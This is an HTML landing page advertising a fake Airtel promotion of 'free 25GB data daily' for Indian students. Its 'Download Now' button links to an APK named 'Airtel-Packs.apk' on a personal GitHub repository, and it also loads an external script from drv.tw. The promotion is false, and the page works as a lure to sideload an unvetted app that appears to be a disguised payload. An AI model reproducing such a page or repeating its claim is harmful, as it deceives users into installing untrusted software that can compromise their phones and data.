
<html>
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <head>
        <Title>Download</Title>
        <style>
            body{
                font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            }
    .box-2 {
      border: px solid;
      overflow:hidden;
      border-color: #e22319;
    }
    .myButton {
        background-color:#e22319;
        cursor:pointer;
        color:#ffffff;
        font-family:Arial;
        font-size:20px;
        font-weight:bold;
        padding: 15px;
        text-decoration:none;
        text-shadow:0px 1px 0px #e22319;
    }
    .myButton:hover {
        background-color:#e22319;
    }
    .myButton:active {
        position:relative;
        top:1px;
    }
    
        </style>
    </head>
    <body>
    <center>
        <div class="box-2">
            <img src="https://i.postimg.cc/qRhRHDrX/Blog-1-1.png"  height="260"/>
            <h2>Airtel 25GB Data</h2><h3><br>
                Airtel is giving free 25GB data<br>
                daily to all students of India.<br>
    NO FEES AT ALL.<br>
    Download Airtel-Data app and get 25GB now.</h3>
            <div onclick="window.location='https://github.com/tech9as/io/raw/main/Airtel-Packs.apk'"  class="myButton">Download Now</a>
    
    
            
    
    
        </div>
    </center>
    <script async src="https://drv.tw/inc/wd.js"></script><script async src="https://drv.tw/inc/wd.js"></script></body>
    </html>